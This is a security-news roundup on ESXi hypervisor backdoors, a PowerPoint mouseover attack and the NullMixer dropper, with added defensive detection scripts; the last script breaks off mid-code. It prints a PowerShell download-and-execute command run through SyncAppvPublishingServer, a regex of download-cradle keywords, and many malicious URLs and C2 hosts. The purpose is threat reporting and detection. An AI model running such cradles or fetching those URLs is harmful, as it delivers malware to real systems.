This Week in Malware - 135 Packages Target npm and PyPI Registries

This week in malware, we discovered and analyzed 135 packages flagged as malicious, suspicious, or dependency confusion attacks in npm and PyPI registries.

The post This Week in Malware – 135 Packages Target npm and PyPI Registries appeared first on Security Boulevard.

Over the past few years, threat actors have adapted their tactics to focus on the specific operating systems and operating environments that carry the most sensitive data, or where an attack can have the greatest effect. By developing and using specialized techniques, cyber criminals increase their opportunities to steal intellectual property and to ransom and extort their victims and their victims' customers. Malicious actors gain access to these target environments through a variety of methods, often exploiting operational security weaknesses in credential management, network security practices, and unhardened operating environments.

Mandiant has brought to our attention a new variant of malware targeting vSphere. This malware is built to remain both persistent and covert, which is consistent with the goals of larger threat actors and APT groups that target strategic institutions intending to dwell undetected for some time. This contrasts with the toolkits of threat actors who conduct "noisy," financially motivated attacks using ransomware.

We would like to thank Mandiant for sharing their findings. You can find much more information about specific detection and mitigation techniques for these issues, questions & answers, as well as preventative techniques for strengthening operational security, secure configuration practices, and defense-in-depth in our document “Protecting vSphere From Specialized Malware” at core.vmware.com.

The post Protecting vSphere From Specialized Malware appeared first on VMware Security Blog.

The group continued to use the LookBack backdoor, but also deployed several new types of malware.


Threat actors have been found deploying never-before-seen post-compromise implants in VMware’s virtualization software to seize control of infected systems and evade detection.
Google’s Mandiant threat intelligence division referred to it as a “novel malware ecosystem” that impacts VMware ESXi, Linux vCenter servers, and Windows virtual machines, allowing attackers to maintain persistent access


An espionage-focused threat actor has been observed using a steganographic trick to conceal a previously undocumented backdoor in a Windows logo in its attacks against Middle Eastern governments.
Broadcom’s Symantec Threat Hunter Team attributed the updated tooling to a hacking group it tracks under the name Witchetty, which is also known as LookingFrog, a subgroup operating under the TA410


Unknown attackers wielding novel specialized malware have managed to compromise VMware ESXi hypervisors and guest Linux and Windows virtual machines, Mandiant threat analysts have discovered. They named the malware VirtualPITA (ESXi & Linux), VirtualPIE (ESXi), and VirtualGATE (Windows), and shared detection and hardening advice. VirtualPITA and VirtualPIE are backdoors, which the attackers deliver by using malicious vSphere Installation Bundles (VIBs). VirtualGATE is a utility program that incorporates …

The post Attackers use novel technique, malware to compromise hypervisors and virtual machines appeared first on Help Net Security.


Undocumented malware makes up only a small proportion of files, yet it presents a high risk of infection. Sandboxing and analyzing everything in order to eliminate that risk, however, has a major impact on performance. To address this, Cyren has produced Hybrid Analyzer. Using emulation — effectively reverse engineering the code contained in a file automatically — the new offering operates 100 times faster than a malware sandbox and between five and 20 times faster than alternative file analysis solutions. "We've created a product that's based on our AV technology that produces detailed file analysis," says Pete Starr, director of sales…


A social engineering campaign leveraging job-themed lures is weaponizing a years-old remote code execution flaw in Microsoft Office to deploy Cobalt Strike beacons on compromised hosts.
“The payload discovered is a leaked version of a Cobalt Strike beacon,” Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer said in a new analysis published Wednesday.
“The beacon configuration contains


Tech pros need to double-check job offers via LinkedIn, Microsoft warns.

Researchers from Mandiant have discovered a novel malware persistence technique within VMware ESXi Hypervisors.

Mandiant detailed a novel technique used by the malware's authors to maintain persistent administrative access within VMware ESXi hypervisors and, from there, to reach vCenter servers and Windows and Linux virtual machines in order to:

Send commands to the hypervisor that will be routed to the guest VM for execution
Transfer files between the ESXi hypervisor and guest machines running beneath it
Tamper with logging services on the hypervisor
Execute arbitrary commands from one guest VM to another guest VM running on the same hypervisor

The highly targeted and evasive nature of the attack led the experts to believe it was carried out for cyberespionage purposes by a China-linked actor tracked as UNC3886.

In the attack investigated by Mandiant, threat actors relied on malicious vSphere Installation Bundles (“VIBs”) to install two backdoors on the ESXi hypervisors, tracked as VIRTUALPITA and VIRTUALPIE. VIBs are collections of files that are designed to manage virtual systems, they can be used to create startup tasks, custom firewall rules, or deploy custom binaries upon the restart of an ESXi machine.

“This malware ecosystem was initially detected during an intrusion investigation when Mandiant identified attacker commands sourced from the legitimate VMware Tools process, vmtoolsd.exe, on a Windows virtual machine hosted on a VMware ESXi hypervisor.” reads the report published by Mandiant. “Mandiant analyzed the boot profile for the ESXi hypervisors and identified a never-before-seen technique in which a threat actor leveraged malicious vSphere Installation Bundles (“VIBs”) to install multiple backdoors on the ESXi hypervisors. We call these backdoors VIRTUALPITA and VIRTUALPIE.”

VMware ESXi Hypervisors

The experts pointed out that an attacker needs admin-level privileges on the ESXi hypervisor before they can deploy the malware. Mandiant found no evidence that zero-day exploits were used to gain initial access or to deploy the malicious VIBs.

VIBs are composed of:

An XML descriptor file
A "VIB payload" (.vgz archive)
A signature file – a digital signature used to verify the host acceptance level of a VIB

The XML Descriptor File is a config which contains references to the following:

The payload to be installed
VIB metadata, such as the name and install date
The signature file that belongs to the VIB

Mandiant researchers discovered that the attackers modified the acceptance level in the VIB's XML descriptor from 'community' to 'partner' to make the VIB appear to have been created by a trusted entity.

“While the acceptance-level field was modified in the Descriptor XML by the attacker, the ESXi system still did not allow for a falsified VIB file to be installed below the minimal set acceptance level. To circumvent this, the attacker abused the --force flag to install malicious CommunitySupported VIBs.” continues the report.

The attackers used this technique to install the VirtualPITA and VirtualPIE backdoors on the compromised ESXi machines.
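The two checks a defender can derive from the description above are (a) an installed VIB whose acceptance level is lower than the host's configured level, which cannot happen through the normal install path and so points at --force or at a level raised after the fact, and (b) a descriptor.xml that claims 'partner' or better without a signature file beside it. The script below is an added example written for this page, not Mandiant's tooling and not the audit script from VMware KB 89619; it parses constructed samples of `esxcli software vib list` and `esxcli software acceptance get` output and a constructed descriptor.xml (the VIB name, vendor and versions are made up). It only checks for the presence of a signature member; it does not verify the PKCS#7 signature itself.

```python
import re
import xml.etree.ElementTree as ET

# vSphere acceptance levels, most to least trusted.
ACCEPTANCE_RANK = {
    "VMwareCertified": 4,
    "VMwareAccepted": 3,
    "PartnerSupported": 2,
    "CommunitySupported": 1,
}

# descriptor.xml spells the same levels in short lower-case form.
DESCRIPTOR_LEVELS = {
    "certified": "VMwareCertified",
    "accepted": "VMwareAccepted",
    "partner": "PartnerSupported",
    "community": "CommunitySupported",
}

# Constructed sample of `esxcli software vib list` output; not from a real host.
SAMPLE_VIB_LIST = """\
Name             Version                   Vendor   Acceptance Level    Install Date
---------------  ------------------------  -------  ------------------  ------------
esx-base         7.0.3-0.35.19193900       VMware   VMwareCertified     2022-03-01
nvme-pcie        1.2.3.16-1vmw.703.0.20    VMware   VMwareCertified     2022-03-01
lsi-msgpt35      19.00.02.00-1OEM.700.1.0  BCM      PartnerSupported    2022-03-01
lsu-lsi-drivers  1.0.0-1                   unknown  CommunitySupported  2022-08-19
"""

# Constructed sample of `esxcli software acceptance get` output.
SAMPLE_HOST_LEVEL = "PartnerSupported\n"

# Constructed descriptor.xml claiming 'partner' for a hypothetical VIB.
SAMPLE_DESCRIPTOR = """\
<vib version="5.0">
  <type>bootbank</type>
  <name>lsu-lsi-drivers</name>
  <version>1.0.0-1</version>
  <vendor>unknown</vendor>
  <acceptance-level>partner</acceptance-level>
  <payloads>
    <payload name="lsu-lsi-drivers" type="vgz"></payload>
  </payloads>
</vib>
"""


def parse_esxcli_table(text):
    """Parse esxcli's tabular output: a header row, a dashed underline row, then
    one row per item. esxcli pads every column and separates columns with at
    least two spaces, which is what the split relies on."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    header = re.split(r"\s{2,}", lines[0].strip())
    rows = []
    for line in lines[2:]:  # lines[1] is the dashed underline
        fields = re.split(r"\s{2,}", line.strip())
        rows.append(dict(zip(header, fields)))
    return rows


def vibs_below_host_level(vib_list_text, host_level_text):
    """Return (name, level) for every installed VIB whose acceptance level is
    lower than the host's configured level. Such a VIB cannot be installed
    through the normal path, so it arrived via --force or before the host
    level was raised; either way it deserves a closer look."""
    host_rank = ACCEPTANCE_RANK[host_level_text.strip()]
    flagged = []
    for vib in parse_esxcli_table(vib_list_text):
        level = vib["Acceptance Level"]
        if ACCEPTANCE_RANK.get(level, 0) < host_rank:
            flagged.append((vib["Name"], level))
    return flagged


def descriptor_level(descriptor_xml):
    """Return the canonical acceptance level a VIB's descriptor.xml claims.
    An unknown or missing value is treated as CommunitySupported."""
    root = ET.fromstring(descriptor_xml)
    claimed = root.findtext("acceptance-level", "").strip().lower()
    return DESCRIPTOR_LEVELS.get(claimed, "CommunitySupported")


def descriptor_claim_is_suspicious(descriptor_xml, has_signature):
    """A descriptor claiming PartnerSupported or better must come with a
    signature file (sig.pkcs7 in the VIB archive). A claim without one is the
    tampering pattern described above. has_signature only records whether a
    non-empty signature member exists; it is not a cryptographic check."""
    level = descriptor_level(descriptor_xml)
    claims_trusted = ACCEPTANCE_RANK[level] >= ACCEPTANCE_RANK["PartnerSupported"]
    return claims_trusted and not has_signature


if __name__ == "__main__":
    for name, level in vibs_below_host_level(SAMPLE_VIB_LIST, SAMPLE_HOST_LEVEL):
        print(f"review: {name} is {level}, below the host acceptance level")
    if descriptor_claim_is_suspicious(SAMPLE_DESCRIPTOR, has_signature=False):
        print(f"review: descriptor claims {descriptor_level(SAMPLE_DESCRIPTOR)} "
              "but no signature is present")
```

On a real host the two inputs come from `esxcli software vib list` and `esxcli software acceptance get` run on the ESXi shell (or over SSH); the descriptor check needs the VIB archive extracted first. A hit from either function is a reason to compare the host's boot profile against a known-good baseline, not proof of compromise on its own.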

VIRTUALPITA is a 64-bit passive backdoor that creates a listener on a hardcoded port on the VMware ESXi server and supports arbitrary command execution. VIRTUALPIE is a lightweight Python backdoor that supports arbitrary command-line execution, file transfer, and reverse shell capabilities.

Researchers also discovered a unique malware sample, tracked as VirtualGate, which includes a dropper and a payload. The malicious code was hosted by the infected hypervisors.

“While we noted the technique used by UNC3886 requires a deeper level of understanding of the ESXi operating system and VMWare’s virtualization platform, we anticipate a variety of other threat actors will use the information outlined in this research to begin building out similar capabilities.” concludes the report. “Mandiant recommends organizations using ESXi and the VMware infrastructure suite follow the hardening steps outlined in this blog post to minimize the attack surface of ESXi hosts.”


Pierluigi Paganini

(SecurityAffairs – hacking, VMware ESXi)

The post Experts uncovered novel Malware persistence within VMware ESXi Hypervisors appeared first on Security Affairs.


Original release date: September 29, 2022

VMware has released Protecting vSphere From Specialized Malware, addressing malware artifacts known as VirtualPITA (ESXi & Linux), VirtualPIE (ESXi), and VirtualGATE (Windows), which are used to compromise ESXi instances and gain persistent access to them.

CISA urges organizations employing VMware ESXi to review the following for more information and to apply the recommended mitigations and threat hunting guidance:

VMware: Protecting vSphere From Specialized Malware
VMware: Knowledge Base 89619 – Mitigation and Threat Hunting Guidance for Unsigned vSphere Installation Bundles (VIBs) in ESXi (including a script to audit ESXi hosts)
VMware: vSphere Security Configuration Guides (baseline hardening guidance for VMware vSphere)



A new malware named Chaos raises concerns as it spreads on multiple architectures and operating systems.

The post New Chaos malware spreads over multiple architectures appeared first on TechRepublic.


A recently discovered malware builder sold on the dark web, Quantum Builder, is being used in a new campaign featuring fresh tactics to deliver the Agent Tesla .NET-based keylogger and remote access trojan (RAT), according to an alert issued by the ThreatLabz research unit of cybersecurity company Zscaler.



Researchers at Cluster25 have published research about exploit code that’s triggered when a user moves their mouse over a link in a booby-trapped PowerPoint presentation.

The code starts a PowerShell script that downloads and executes a dropper for Graphite malware.

Graphite is named after Microsoft’s Graph API, which it uses to access command and control (C2) resources on Microsoft OneDrive. This type of communication allows the malware to avoid detection for longer, because it only connects to legitimate Microsoft domains.

The attack was attributed to APT28, also known as Sofacy or Fancy Bear, a notorious Russian threat actor that has been active since at least 2004. Its main activity is collecting intelligence for the Russian government. The group is known to have targeted US politicians, organizations, and even nuclear facilities.

Cluster25 indicates that entities and individuals in the defense and government sectors of European countries may have been the potential targets of this campaign. But, as we always say, attribution is hard, and thinking you aren’t a target isn’t a good defense strategy.

Malicious mouseover

The technique used in this attack does not require macros to be enabled. It uses the Windows native SyncAppvPublishingServer utility, which is triggered by simply hovering over a hyperlink.

Basically, hovering the mouse over the link can be used to trigger:

SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://example.org/malice.ps1') | IEX"

which downloads a script (malice.ps1 in this example) and hands it to Invoke-Expression, so arbitrary code runs on the affected system.

In the example discovered by Cluster25, the malicious link triggered a PowerShell script that downloaded a DLL file from OneDrive, disguised with a .jpeg extension. The file was later decrypted and written to the local path C:\ProgramData\lmapi2.dll. The script also added a registry key to execute the DLL via rundll32.exe for persistence.

The victim does not need administrator access to trigger a successful attack. This technique is by no means new—it was spotted spreading malware five years ago, in 2017.

Mitigation

SyncAppvPublishingServer has no business running unless the Application Virtualization (App-V) for Windows client is active on the system. App-V delivers Win32 applications to users as virtual applications, which are installed on centrally managed servers and delivered as a service in real time, on an as-needed basis. Users launch and interact with virtual applications as if they are installed locally.

So, unless you are using this functionality, it is safe to block SyncAppvPublishingServer.exe. Also, Microsoft Office’s Protected View should stop the code from executing. Protected View is enabled by default and should not be disabled. You can check this by opening an Office file and clicking on File > Options, then Trust Center > Trust Center Settings > Protected View to view the active settings.
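Blocking the binary is the cleanest fix; where that is not possible, the same facts give a detection. The script below is an added example written for this page (not Cluster25's or Malwarebytes' code): it scans process-creation events and flags SyncAppvPublishingServer.exe when it is spawned by an Office application, when its argument looks like a PowerShell download cradle rather than a publishing-server URL, or, if App-V is not deployed at all, whenever it runs. The events are constructed JSON Lines with field names modelled on what Sysmon process-creation events carry (image, parent image, command line); the hostnames, paths and the internal publishing-server URL are made up.

```python
import json
import re
from pathlib import PureWindowsPath

# Office hosts that should never be the parent of an App-V sync.
OFFICE_PARENTS = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}

# Argument content that marks a PowerShell download cradle rather than the
# "n;<publishing server URL>" form the utility is built to receive.
CRADLE_PATTERNS = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|net\.webclient|"
    r"invoke-webrequest|\biwr\b|frombase64string",
    re.IGNORECASE,
)

# Constructed process-creation events (JSON Lines); not real telemetry.
SAMPLE_EVENTS = r"""
{"ts": "2022-09-26T10:14:03Z", "image": "C:\\Windows\\System32\\SyncAppvPublishingServer.exe", "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE", "cmdline": "SyncAppvPublishingServer.exe \"n;(New-Object Net.WebClient).DownloadString('http://example.org/malice.ps1') | IEX\""}
{"ts": "2022-09-26T10:20:11Z", "image": "C:\\Windows\\System32\\SyncAppvPublishingServer.exe", "parent": "C:\\Windows\\System32\\svchost.exe", "cmdline": "SyncAppvPublishingServer.exe \"n;https://appv-publishing.corp.example:443\""}
{"ts": "2022-09-26T10:21:40Z", "image": "C:\\Windows\\System32\\notepad.exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "notepad.exe notes.txt"}
{"ts": "2022-09-26T10:25:02Z", "image": "C:\\Windows\\System32\\SyncAppvPublishingServer.exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "SyncAppvPublishingServer.exe \"n;IEX (New-Object Net.WebClient).DownloadString('http://example.org/b.ps1')\""}
"""


def basename(path):
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return PureWindowsPath(path).name.lower()


def flag_syncappv_abuse(events_text, appv_in_use=False):
    """Return (timestamp, [reasons]) for every SyncAppvPublishingServer.exe
    launch that looks like abuse. appv_in_use says whether the App-V client is
    legitimately deployed in this environment; when it is not, any launch at
    all is unexpected and is reported."""
    hits = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if basename(ev["image"]) != "syncappvpublishingserver.exe":
            continue
        reasons = []
        if basename(ev["parent"]) in OFFICE_PARENTS:
            reasons.append("spawned by an Office application")
        if CRADLE_PATTERNS.search(ev["cmdline"]):
            reasons.append("command line contains a PowerShell download cradle")
        if not appv_in_use:
            reasons.append("App-V is not deployed, so any launch is unexpected")
        if reasons:
            hits.append((ev["ts"], reasons))
    return hits


if __name__ == "__main__":
    for ts, reasons in flag_syncappv_abuse(SAMPLE_EVENTS, appv_in_use=True):
        print(ts, "->", "; ".join(reasons))
```

With App-V in use, only the two cradle launches are reported and the sync against the internal publishing server passes; with App-V absent, that sync is reported too, which is the intended behaviour given the mitigation above. The cradle regex is a starting point and should be extended for the obfuscations seen in your own telemetry.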

Malwarebytes

Malwarebytes users are protected against this attack.

Our web protection module blocks the OneDrive URLs and our Real-time Protection module detects lmapi2.dll as Trojan.Downloader.

Malwarebytes blocks lmapi2.dll


Originally published by CrowdStrike here. Written by Ioan Iacob and Iulian Madalin Ionita, CrowdStrike. In Part 1 of this four-part blog series examining wiper malware, we introduced the topic of wipers, reviewed their recent history and presented common adversary techniques that leverage wipers to destroy system data. In Part 2, the Endpoint Protection Content Research Team discusses how threat actors have used legitimate third-party drivers to bypass the visibility and detection capabilitie…

A new dropper named “NullMixer” is spreading multiple malware families, including some seen regularly by the RH-ISAC community.

Context

On September 26, 2022, researchers at SecureList reported a new dropper they named “NullMixer” which spreads multiple malware families via malicious websites impersonating legitimate software downloads. According to SecureList, in addition to multiple malware families, NullMixer also drops a wide variety of malicious binaries including backdoors, bankers, downloaders, and spyware.

Community Impact

According to SecureList, the malware families being spread by NullMixer:

SmokeLoader
RedLine Stealer
PseudoManuscrypt
ColdStealer
FormatLoader
CsdiMonetize
DanaBot
Disbuk
Fabookie
GCleaner
LgoogLoader
PrivateLoader
Racealer
Satacom
SgnitLoader
ShortLoader
Vidar

Several of these malware families are familiar to the retail, hospitality, and travel communities. As such, organizations are encouraged to maintain awareness of the tactics, techniques, and procedures NullMixer uses to drop malware, and to ingest the indicators of compromise (IOCs) provided here.

Technical Details

SecureList researchers provided the following infection chain for NullMixer, which is based on user execution (MITRE Technique T1204):

The user visits a website to download cracked software, keygens or activators. The campaign appears to target anyone looking to download cracked software, and uses SEO techniques to make these malicious sites more prominent at the top of search engine results.
The user clicks on the download link for the desired software.
The link redirects the user to another malicious website.
The malicious website redirects the user to a third-party IP address webpage.
The webpage instructs the user to download a password-protected ZIP file from a file sharing website.
The user extracts the archived file with the password.
The user runs the installer and executes the malware.

IOCs

Securelist researchers provided the following IOCs (the hashes are 32 hex characters, i.e. MD5):

Indicator | Type | Notes
hxxps://azilominehostz[.]xyz/ | Domain | Malicious URL
hxxps://patchlinks[.]com/ | Domain | Malicious URL
hxxp://137[.]184[.]159[.]42/ | Domain | Malicious URL
hxxp://185[.]186[.]142[.]166/wallet[.]exe | Domain | Malicious URL
hxxps://dll1[.]stdcdn[.]com/ | Domain | Malicious URL
hxxp://tg8[.]cllgxx[.]com/hp8/g1/yrpp1047[.]exe | Domain | Malicious URL
hxxp://eurekabike[.]com/pmzero/design/img/LightCleaner9252839[.]exe | Domain | Malicious URL
hxxps://i[.]xyzgamei[.]com/gamexyz/2201/random[.]exe | Domain | Malicious URL
hxxp://www[.]sxhxrj[.]com/askhelp35/askinstall35[.]exe | Domain | Malicious URL
hxxps://presstheme[.]me/ | Domain | Malicious URL
hxxp://remviagra[.]com/pub1[.]exe | Domain | Malicious URL
hxxp://privacy-tools-for-you-782[.]com/downloads/toolspab2[.]exe | Domain | Malicious URL
hxxps://cdn[.]discordapp[.]com/attachments/917889480646590537/935966171835031612/Cube_WW6[.]exe | Domain | Malicious URL
hxxp://onlinehueplet[.]com/77_1[.]exe | Domain | Malicious URL
hxxps://cdn[.]discordapp[.]com/attachments/934006169125679147/943432754161410108/WW19[.]exe | Domain | Malicious URL
hxxp://privacy-tools-for-you-791[.]com/downloads/toolspab1[.]exe | Domain | Malicious URL
hxxps://cdn[.]discordapp[.]com/attachments/917889480646590537/943130993404018709/Fixtools[.]exe | Domain | Malicious URL
hxxp://stylesheet[.]faseaegasdfase[.]com/hp8/g1/rtst1051[.]exe | Domain | Malicious URL
hxxp://104[.]168[.]215[.]231/kde[.]exe | Domain | Malicious URL
hxxp://careerguide4u[.]online/wp-content/plugins/google-analytics-for-wordpress/BlackCleanerSetp521234[.]exe | Domain | Malicious URL
hxxps://i[.]xyzgamei[.]com/gamexyz/2203/random[.]exe | Domain | Malicious URL
hxxp://zenitsu[.]s3[.]pl-waw[.]scw[.]cloud/pub-summoning/poweroff[.]exe | Domain | Malicious URL
hxxps://tengenuzui[.]s3[.]pl-waw[.]scw[.]cloud/makio/cpm_pr_vp46up4d6j_[.]exe | Domain | Malicious URL
hxxps://tengenuzui[.]s3[.]pl-waw[.]scw[.]cloud/makio/updto_bgn64wau5x_date[.]exe | Domain | Malicious URL
hxxps://tengenuzui[.]s3[.]pl-waw[.]scw[.]cloud/makio/handler_wbba4vzm89rxskhs[.]exe | Domain | Malicious URL
hxxps://i[.]xyzgamei[.]com/gamexyz/25/random[.]exe | Domain | Malicious URL
hxxps://v[.]xyzgamev[.]com/25[.]html | Domain | Malicious URL
hxxps://v[.]xyzgamev[.]com/login[.]html | Domain | Malicious URL
hxxp://jackytpload[.]su/campaign6/autosubplayer[.]exe | Domain | Malicious URL
hxxps://gc-distribution[.]biz/pub[.]php?pub=five | Domain | Malicious URL
hxxp://www[.]sxhxrj[.]com/askhelp42/askinstall42[.]exe | Domain | Malicious URL
hxxps://flexnetinformatica[.]com[.]br/wp-content/plugins/elementor/assets/LightCleaner2132113[.]exe | Domain | Malicious URL
hxxp://stylesheet[.]faseaegasdfase[.]com/hp8/g1/siww1053[.]exe | Domain | Malicious URL
hxxps://source3[.]boys4dayz[.]com/installer[.]exe | Domain | Malicious URL
hxxps://signaturebusinesspark[.]com/360/fw3[.]exe | Domain | Malicious URL
hxxps://signaturebusinesspark[.]com/360/fw4[.]exe | Domain | Malicious URL
hxxps://signaturebusinesspark[.]com/360/fw6[.]exe | Domain | Malicious URL
hxxps://cdn[.]discordapp[.]com/attachments/937783814208491553/937784072967692368/SecondFile[.]exe | Domain | Malicious URL
hxxps://v[.]xyzgamev[.]com/23[.]html | Domain | Malicious URL
178.62.113[.]205/runtermo | Domain | Malware C2
185.163.204[.]22/runtermo | Domain | Malware C2
185.163.45[.]70/runtermo | Domain | Malware C2
185.186.142[.]166 | Domain | Malware C2
185.215.113[.]10 | Domain | Malware C2
185.38.142[.]132 | Domain | Malware C2
212.193.30[.]21/base/api/ | Domain | Malware C2
212.193.30[.]45/proxies.txt | Domain | Malware C2
5.9.224[.]217 | Domain | Malware C2
92.255.57[.]115 | Domain | Malware C2
ads-memory[.]biz | Domain | Malware C2
all-mobile-pa1ments.com[.]mx | Domain | Malware C2
all-smart-green[.]com | Domain | Malware C2
am1420wbec[.]com/upload/ | Domain | Malware C2
appwebstat[.]biz | Domain | Malware C2
banhamm[.]com | Domain | Malware C2
buy-fantasy-fo0tball.com[.]sg | Domain | Malware C2
buy-fantasy-gmes.com[.]sg | Domain | Malware C2
connectini[.]net | Domain | Malware C2
dll1.stdcdn[.]com | Domain | Malware C2
dollybuster[.]at/upload/ | Domain | Malware C2
egsagl[.]com/upload/ | Domain | Malware C2
enter-me[.]xyz | Domain | Malware C2
fennsports[.]com/upload/ | Domain | Malware C2
file-coin-host-12[.]com | Domain | Malware C2
ginta[.]link | Domain | Malware C2
hhiuew33[.]com/check/safe | Domain | Malware C2
host-data-coin-11[.]com | Domain | Malware C2
islamic-city[.]com/upload/ | Domain | Malware C2
mordo[.]ru/upload/ | Domain | Malware C2
nahbleiben[.]at/upload/ | Domain | Malware C2
noblecreativeaz[.]com/upload/ | Domain | Malware C2
one-wedding-film[.]com | Domain | Malware C2
piratia-life[.]ru/upload/ | Domain | Malware C2
presstheme[.]me | Domain | Malware C2
real-enter-solutions[.]xyz | Domain | Malware C2
recmaster[.]ru/upload/ | Domain | Malware C2
remik-franchise[.]ru/upload/ | Domain | Malware C2
reoseio[.]com | Domain | Malware C2
signaturebusinesspark[.]com | Domain | Malware C2
sovels[.]ru/upload/ | Domain | Malware C2
spaldingcompanies[.]com/upload/ | Domain | Malware C2
toa.mygametoa[.]com | Domain | Malware C2
topexpertshop[.]com | Domain | Malware C2
topniemannpicksh0p[.]cc | Domain | Malware C2
tvqaq[.]cn/upload/ | Domain | Malware C2
whsddzs[.]com/Home/Index/djksye | Domain | Malware C2
06B31367D65A411B1F2A7B3091FB31D4 | Hash | Coldstealer
584B186152A16161E502816BF990747C | Hash | Coldstealer
C41A85123AF144790520F502FE190110 | Hash | Coldstealer
5B14369C347439BECACAA0883C07F17B | Hash | CsdiMonetize
7E58613DDB2FDD10EED17BBCE5B3E0A9 | Hash | CsdiMonetize
883403C940B477CEE083EFEEA8C252C6 | Hash | CsdiMonetize
98F0556A846F223352DA516AF66FA1A0 | Hash | CsdiMonetize
CEADA3798FD16FAC13F053D0C6F4D198 | Hash | CsdiMonetize
D91325640F392D33409B8F1B2315B97C | Hash | DanaBot
3739256794EBF9BA8C6597A4687C8799 | Hash | Disbuk
FBD3940D1AD28166D8539EAE23D44D5B | Hash | Disbuk
AAEFF1F8E7BD3A81C69C472BCD211A7B | Hash | Downloader.Bitser
E65BF2D56FCAA18C1A8D0D481072DC62 | Hash | Downloader.INNO
33F7383C2EB9B20E11E6A149AA62DEA4 | Hash | Fabookie
79400B1FD740D9CB7EC7C2C2E9A7D618 | Hash | Fabookie
B8ECEC542A07067A193637269973C2E8 | Hash | FormatLoader
42100BAF34C4B1B0E89F1C2EF94CF8F8 | Hash | GCleaner
4D75DEA49F6BD60F725FAE9C28CD0960 | Hash | Generic.ClipBanker
CC722FD0BD387CF472350DC2DD7DDD1E | Hash | LgoogLoader
4008D7F17A08EFD3FBD18E4E1BA29E00 | Hash | LgoogLoader
B2A2F85B4201446B23A250F68051B4DC | Hash | LgoogLoader
4EC312D77817D8FB90403FF87B88D5E3 | Hash | NullMixer
12DBC75B071077042C097AFD59B2137F | Hash | NullMixer
F94BF1734F34665A65A835CC04A4AD95 | Hash | NullMixer
362592241E15293C68D0F24468723BBB | Hash | PrivateLoader
7875AAB3E23F885DF12FF62D9EF5DB50 | Hash | PrivateLoader
B0448525C5A00135BB5B658CC6745574 | Hash | PseudoManuscrypt
D5C1C44D19D8D6E8C0F739CAB439E45E | Hash | PseudoManuscrypt
4FEBA8683DAA18545E9F9408E4CD07BD | Hash | Racealer
446119332738133D3ECD2D00EBE5D0EC | Hash | RedLine
5994DE41D8B4ED3BBB4F870A33CB839A | Hash | RedLine
9F8800BF866E944EFB2034EC56ED574E | Hash | RedLine
AC458CABFED224353545707DF966A2BA | Hash | RedLine
AF817AAD791628143019FFDE530D0EF7 | Hash | RedLine
2086E25FB651F0A8D713024DE2168B9B | Hash | Satacom
B2620FFE40493FDF9E771BFF3BDCBC44 | Hash | SgnitLoader
4DD3F638D4C370ABEB3EBF59CAD8ED2F | Hash | SgnitLoader
CE54B9287C3E4B5733035D0BE085D989 | Hash | ShortLoader
9F1EAA0FF990913F7D4DFD31841DE47A | Hash | SmokeLoader
639DE55E338BFCEA8DAAE727141AF3D1 | Hash | Vidar
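Ingesting a list like this means refanging it (hxxp back to http, [.] back to a dot) and then deciding what to match on. Two details matter in practice: a few rows in the source use the Cyrillic letter х in place of x, which a naive hxxp replacement misses, and several URLs sit on cdn.discordapp.com, where matching the hostname alone would alert on every legitimate Discord attachment. The script below is an added example written for this page, not RH-ISAC's or Securelist's tooling: it takes a subset of the rows above in their defanged form, builds URL, host and MD5 sets, and runs them against a constructed proxy log and a constructed file-hash inventory (the client IPs, timestamps, the example.com line, the holiday.png attachment and the file paths are made up).

```python
import re
from urllib.parse import urlsplit

# Hosts shared by many legitimate users: match only on the full URL, never on
# the hostname alone.
SHARED_HOSTS = {"cdn.discordapp.com"}

# Subset of the indicator rows above, kept in the table's defanged form
# (the last URL row deliberately uses the Cyrillic х seen in some rows).
DEFANGED_IOCS = """\
hxxps://azilominehostz[.]xyz/ | Domain | Malicious URL
hxxp://185[.]186[.]142[.]166/wallet[.]exe | Domain | Malicious URL
hxxps://cdn[.]discordapp[.]com/attachments/917889480646590537/935966171835031612/Cube_WW6[.]exe | Domain | Malicious URL
h\u0445\u0445p://zenitsu[.]s3[.]pl-waw[.]scw[.]cloud/pub-summoning/poweroff[.]exe | Domain | Malicious URL
185.186.142[.]166 | Domain | Malware C2
ads-memory[.]biz | Domain | Malware C2
212.193.30[.]21/base/api/ | Domain | Malware C2
4EC312D77817D8FB90403FF87B88D5E3 | Hash | NullMixer
9F1EAA0FF990913F7D4DFD31841DE47A | Hash | SmokeLoader
"""

# Constructed proxy log: timestamp, client, method, URL, status. Not real traffic.
SAMPLE_PROXY_LOG = """\
2022-09-27T08:12:44Z 10.0.0.15 GET http://185.186.142.166/wallet.exe 200
2022-09-27T08:13:02Z 10.0.0.15 POST http://212.193.30.21/base/api/ 200
2022-09-27T08:15:10Z 10.0.0.22 GET https://cdn.discordapp.com/attachments/1/2/holiday.png 200
2022-09-27T08:16:31Z 10.0.0.22 GET https://cdn.discordapp.com/attachments/917889480646590537/935966171835031612/Cube_WW6.exe 200
2022-09-27T08:17:05Z 10.0.0.31 GET https://www.example.com/index.html 200
2022-09-27T08:18:47Z 10.0.0.31 GET http://ads-memory.biz/gate.php 404
"""

# Constructed endpoint file inventory: md5 and path. Not real data.
SAMPLE_FILE_HASHES = """\
4ec312d77817d8fb90403ff87b88d5e3 C:\\Users\\user\\Downloads\\setup.exe
d41d8cd98f00b204e9800998ecf8427e C:\\Users\\user\\Downloads\\empty.bin
"""


def refang(indicator):
    """Undo the defanging used in the table, including the Cyrillic х variant."""
    s = indicator.strip().replace("\u0445", "x")
    s = re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)
    return s.replace("[.]", ".").replace("[:]", ":")


def build_indicator_set(text):
    """Turn 'indicator | type | notes' rows into url, host and md5 sets.
    A row with a scheme is a full URL; its host is also recorded unless the
    host is shared infrastructure. A row without a scheme is host[/path]."""
    urls, hosts, md5s = set(), set(), set()
    for line in text.splitlines():
        if not line.strip():
            continue
        raw, kind, _note = (p.strip() for p in line.split("|"))
        if kind.lower() == "hash":
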